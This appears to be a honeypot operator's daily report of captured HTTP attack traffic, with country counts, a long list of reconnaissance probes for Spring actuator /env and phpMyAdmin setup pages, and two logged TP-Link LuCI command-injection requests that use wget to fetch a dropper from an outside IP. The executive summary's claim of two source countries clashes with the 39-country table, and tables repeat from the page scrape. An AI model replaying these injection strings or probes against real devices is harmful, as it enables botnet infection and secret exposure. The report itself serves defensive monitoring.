Table of Contents

Daily Report: 2025-06-08
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 184 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1136 requests were recorded during the day, originating from 2 different countries, with a peak of 271 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Dubai

botnet_dropper_behaviour
#

remote_addr	request
195.3.221.137	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://45.125.66.79/x/tplink+-O-
87.121.84.34	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://45.125.66.79/x/tplink+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
141	2	HEAD /_phpMyAdmin/scripts/setup.php HTTP/1.1
147	1	\x00\x0E\x08\xDC\x9A\x5C\x0Bv\xA4\xB9o\x00\x00\x00\x00\x00
159	1	\x00\x0E8\xDA\xB9c\xAC\x11\xD2\xD6\xC8\x00\x00\x00\x00\x00
163	1	GET /client-portal/env HTTP/1.1
164	1	GET /cf-gateway/actuator/env HTTP/1.1
165	1	GET /cf-gateway/env HTTP/1.1
166	1	GET /cas/actuator/env HTTP/1.1
167	1	GET /cas/env HTTP/1.1
168	1	GET /basket/actuator/env HTTP/1.1
169	1	GET /basket/env HTTP/1.1
170	1	GET /base/actuator/env HTTP/1.1
171	1	HEAD /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.1
172	1	HEAD /webadmin/scripts/setup.php HTTP/1.1
173	1	HEAD /PHPMYADMIN/scripts/setup.php HTTP/1.1
174	1	HEAD /phpMyAdmin2/scripts/setup.php HTTP/1.1
175	1	HEAD /MyAdmin/scripts/setup.php HTTP/1.1
176	1	HEAD /phpMyAdmin3/scripts/setup.php HTTP/1.1
177	1	HEAD /webdb/scripts/setup.php HTTP/1.1
179	1	GET /fmapi/env HTTP/1.1
180	1	GET /flute/actuator/env HTTP/1.1
181	1	GET /flute/env HTTP/1.1
182	1	GET /extend/actuator/env HTTP/1.1
183	1	GET /extend/env HTTP/1.1
184	1	GET /eubase/actuator/env HTTP/1.1
185	1	GET /eubase/env HTTP/1.1
186	1	GET /ees/actuator/env HTTP/1.1
187	1	GET /ees/env HTTP/1.1
188	1	GET /design-tools/actuator/env HTTP/1.1
189	1	GET /design-tools/env HTTP/1.1
190	1	GET /d2c/actuator/env HTTP/1.1
191	1	GET /d2c/env HTTP/1.1
192	1	GET /commercial/actuator/env HTTP/1.1
193	1	GET /commercial/env HTTP/1.1
194	1	GET /client-portal/actuator/env HTTP/1.1
195	1	GET /opac/env HTTP/1.1
196	1	GET /new-policy/actuator/env HTTP/1.1
197	1	GET /new-policy/env HTTP/1.1
198	1	GET /nacos/actuator/env HTTP/1.1
199	1	GET /nacos/env HTTP/1.1
200	1	GET /manage/actuator/env HTTP/1.1
201	1	GET /manage/env HTTP/1.1
202	1	GET /lts-portal/actuator/env HTTP/1.1
203	1	GET /lts-portal/env HTTP/1.1
204	1	GET /kafdrop/actuator/env HTTP/1.1
205	1	GET /kafdrop/env HTTP/1.1
206	1	GET /iam/actuator/env HTTP/1.1
207	1	GET /iam/env HTTP/1.1
208	1	GET /gateway/actuator/env HTTP/1.1
209	1	GET /gateway/env HTTP/1.1
210	1	GET /fmapi/actuator/env HTTP/1.1
211	1	GET /recommendation/env HTTP/1.1
212	1	GET /public-api/actuator/env HTTP/1.1
213	1	GET /public-api/env HTTP/1.1
214	1	GET /prod-api/actuator/env HTTP/1.1
215	1	GET /prod-api/env HTTP/1.1
216	1	GET /spark/actuator/env HTTP/1.1
217	1	GET /spark/env HTTP/1.1
218	1	GET /pcsp/actuator/env HTTP/1.1
219	1	GET /pcsp/env HTTP/1.1
220	1	GET /hadoop/actuator/env HTTP/1.1
221	1	GET /hadoop/env HTTP/1.1
222	1	GET /password/actuator/env HTTP/1.1
223	1	GET /password/env HTTP/1.1
224	1	GET /order/actuator/env HTTP/1.1
225	1	GET /order/env HTTP/1.1
226	1	GET /opac/actuator/env HTTP/1.1
227	1	GET /webapi/env HTTP/1.1
228	1	GET /api-docs/actuator/env HTTP/1.1
229	1	GET /api-docs/env HTTP/1.1
230	1	GET /apis/actuator/env HTTP/1.1
231	1	GET /apis/env HTTP/1.1
232	1	GET /website/actuator/env HTTP/1.1
233	1	GET /website/env HTTP/1.1
234	1	GET /user/actuator/env HTTP/1.1
235	1	GET /user/env HTTP/1.1
236	1	GET /tri/actuator/env HTTP/1.1
237	1	GET /tri/env HTTP/1.1
238	1	GET /tenancy/actuator/env HTTP/1.1
239	1	GET /tenancy/env HTTP/1.1
240	1	GET /surveys/actuator/env HTTP/1.1
241	1	GET /surveys/env HTTP/1.1
242	1	GET /recommendation/actuator/env HTTP/1.1
243	1	GET /dev/env HTTP/1.1
244	1	GET /api-dev/actuator/env HTTP/1.1
245	1	GET /api-dev/env HTTP/1.1
246	1	GET /api-staging/actuator/env HTTP/1.1
247	1	GET /api-staging/env HTTP/1.1
248	1	GET /tomcat/actuator/env HTTP/1.1
249	1	GET /tomcat/env HTTP/1.1
250	1	GET /eth/actuator/env HTTP/1.1
251	1	GET /eth/env HTTP/1.1
252	1	GET /api-reference/actuator/env HTTP/1.1
253	1	GET /api-reference/env HTTP/1.1
254	1	GET /api-explorer/actuator/env HTTP/1.1
255	1	GET /api-explorer/env HTTP/1.1
256	1	GET /api2/actuator/env HTTP/1.1
257	1	GET /api2/env HTTP/1.1
258	1	GET /webapi/actuator/env HTTP/1.1
259	1	GET /openapi/env HTTP/1.1
260	1	GET /apidoc/actuator/env HTTP/1.1
261	1	GET /apidoc/env HTTP/1.1
262	1	GET /api-details/actuator/env HTTP/1.1
263	1	GET /api-details/env HTTP/1.1
264	1	GET /rest-api/actuator/env HTTP/1.1
265	1	GET /rest-api/env HTTP/1.1
266	1	GET /jsapi/actuator/env HTTP/1.1
267	1	GET /jsapi/env HTTP/1.1
268	1	GET /apidocs/actuator/env HTTP/1.1
269	1	GET /apidocs/env HTTP/1.1
270	1	GET /api-doc/actuator/env HTTP/1.1
271	1	GET /api-doc/env HTTP/1.1
272	1	GET /api-documentation/actuator/env HTTP/1.1
273	1	GET /api-documentation/env HTTP/1.1
274	1	GET /dev/actuator/env HTTP/1.1
275	1	GET /api-integration/env HTTP/1.1
276	1	GET /api_v2/actuator/env HTTP/1.1
277	1	GET /api_v2/env HTTP/1.1
278	1	GET /api-gateway/actuator/env HTTP/1.1
279	1	GET /api-gateway/env HTTP/1.1
280	1	GET /apimanage/actuator/env HTTP/1.1
281	1	GET /apimanage/env HTTP/1.1
282	1	GET /document-api/actuator/env HTTP/1.1
283	1	GET /document-api/env HTTP/1.1
284	1	GET /apiv2/actuator/env HTTP/1.1
285	1	GET /apiv2/env HTTP/1.1
286	1	GET /osapi/actuator/env HTTP/1.1
287	1	GET /osapi/env HTTP/1.1
288	1	GET /api-v1/actuator/env HTTP/1.1
289	1	GET /api-v1/env HTTP/1.1
290	1	GET /openapi/actuator/env HTTP/1.1
291	1	GET /ocapi/env HTTP/1.1
292	1	GET /api_docs/actuator/env HTTP/1.1
293	1	GET /api_docs/env HTTP/1.1
294	1	GET /sms-api/actuator/env HTTP/1.1
295	1	GET /sms-api/env HTTP/1.1
296	1	GET /api-guide/actuator/env HTTP/1.1
297	1	GET /api-guide/env HTTP/1.1
298	1	GET /apigw/actuator/env HTTP/1.1
299	1	GET /apigw/env HTTP/1.1
300	1	GET /zapier/actuator/env HTTP/1.1
301	1	GET /zapier/env HTTP/1.1
302	1	GET /tm-api/actuator/env HTTP/1.1
303	1	GET /tm-api/env HTTP/1.1
304	1	GET /iframe_api/actuator/env HTTP/1.1
305	1	GET /iframe_api/env HTTP/1.1
306	1	GET /api-integration/actuator/env HTTP/1.1
307	1	GET /tapi/env HTTP/1.1
308	1	GET /api-testing/actuator/env HTTP/1.1
309	1	GET /api-testing/env HTTP/1.1
310	1	GET /api-keys/actuator/env HTTP/1.1
311	1	GET /api-keys/env HTTP/1.1
312	1	GET /papi/actuator/env HTTP/1.1
313	1	GET /papi/env HTTP/1.1
314	1	GET /userapi/actuator/env HTTP/1.1
315	1	GET /userapi/env HTTP/1.1
316	1	GET /asyncapi/actuator/env HTTP/1.1
317	1	GET /asyncapi/env HTTP/1.1
318	1	GET /api-auth/actuator/env HTTP/1.1
319	1	GET /api-auth/env HTTP/1.1
320	1	GET /restapi/actuator/env HTTP/1.1
321	1	GET /restapi/env HTTP/1.1
322	1	GET /ocapi/actuator/env HTTP/1.1
323	1	GET /authserver/actuator/env HTTP/1.1
324	1	GET /authserver/env HTTP/1.1
325	1	GET /auth/actuator/env HTTP/1.1
326	1	GET /auth/env HTTP/1.1
327	1	GET /app/actuator/env HTTP/1.1
329	1	GET /api-f/actuator/env HTTP/1.1
330	1	GET /api-f/env HTTP/1.1
333	1	GET /account/actuator/env HTTP/1.1
334	1	GET /account/env HTTP/1.1
338	1	GET /tapi/actuator/env HTTP/1.1
354	1	GET /base/env HTTP/1.1
376	1	\x00\x0E8kv\xB1\xEF\xEC)6\xA1\x00\x00\x00\x00\x00
382	1	\x00\x0E8\x09L@5&\xC8\x0C\xFF\x00\x00\x00\x00\x00
396	1	GET /cQ5t HTTP/1.1
397	1	GET /HXTh HTTP/1.1
420	1	HEAD /phpma/scripts/setup.php HTTP/1.1
421	1	HEAD /sqlmanager/scripts/setup.php HTTP/1.1
422	1	\x00\x0E8a\xB0\x95\xD2j\x82\xA5\xD1\x00\x00\x00\x00\x00
434	1	\x00\x0E8\xDC\x9A\x5C\x0Bv\xA4\xB9o\x00\x00\x00\x00\x00
443	1	GET /Odin/http/call1749342075 HTTP/1.1
445	1	GET /OdinHttpCall1749342075 HTTP/1.1
446	1	GET /odinhttpcall1749342075 HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	271	BG
1	236	NL
2	230	US
3	140	GB
4	81	DE
5	20	CN
6	20	NG
7	16	PL
8	15	SC
9	14	IN
10	10	RU
11	9	JP
12	8	GH
13	7	AO
14	7	CA
15	4	SG
16	4	VN
17	4	BE
18	4	FR
19	4	TR
20	3	KZ
21	3	UA
22	3	HK
23	2	HU
24	2	IL
25	2	IE
26	2	PK
27	2	MX
28	2	PA
29	2	ID
30	1	IR
31	1	ES
32	1	PT
33	1	AR
34	1	SE
35	1	CL
36	1	IT
37	1	BA
38	1	KR

Report: 2025-06-07

7 June 2025·304 words

Repport Daily

Report: 2025-06-06

6 June 2025·408 words

Repport Daily

Report: 2025-06-05

5 June 2025·513 words

Repport Daily

	number_of_occurence	country_iso_code
0	271	BG
1	236	NL
2	230	US
3	140	GB
4	81	DE
5	20	CN
6	20	NG
7	16	PL
8	15	SC
9	14	IN
10	10	RU
11	9	JP
12	8	GH
13	7	AO
14	7	CA
15	4	SG
16	4	VN
17	4	BE
18	4	FR
19	4	TR
20	3	KZ
21	3	UA
22	3	HK
23	2	HU
24	2	IL
25	2	IE
26	2	PK
27	2	MX
28	2	PA
29	2	ID
30	1	IR
31	1	ES
32	1	PT
33	1	AR
34	1	SE
35	1	CL
36	1	IT
37	1	BA
38	1	KR

	number_of_occurence	country_iso_code
0	271	BG
1	236	NL
2	230	US
3	140	GB
4	81	DE
5	20	CN
6	20	NG
7	16	PL
8	15	SC
9	14	IN
10	10	RU
11	9	JP
12	8	GH
13	7	AO
14	7	CA
15	4	SG
16	4	VN
17	4	BE
18	4	FR
19	4	TR
20	3	KZ
21	3	UA
22	3	HK
23	2	HU
24	2	IL
25	2	IE
26	2	PK
27	2	MX
28	2	PA
29	2	ID
30	1	IR
31	1	ES
32	1	PT
33	1	AR
34	1	SE
35	1	CL
36	1	IT
37	1	BA
38	1	KR

Daily Report: 2025-06-08#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-06-08
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	271	BG
1	236	NL
2	230	US
3	140	GB
4	81	DE
5	20	CN
6	20	NG
7	16	PL
8	15	SC
9	14	IN
10	10	RU
11	9	JP
12	8	GH
13	7	AO
14	7	CA
15	4	SG
16	4	VN
17	4	BE
18	4	FR
19	4	TR
20	3	KZ
21	3	UA
22	3	HK
23	2	HU
24	2	IL
25	2	IE
26	2	PK
27	2	MX
28	2	PA
29	2	ID
30	1	IR
31	1	ES
32	1	PT
33	1	AR
34	1	SE
35	1	CL
36	1	IT
37	1	BA
38	1	KR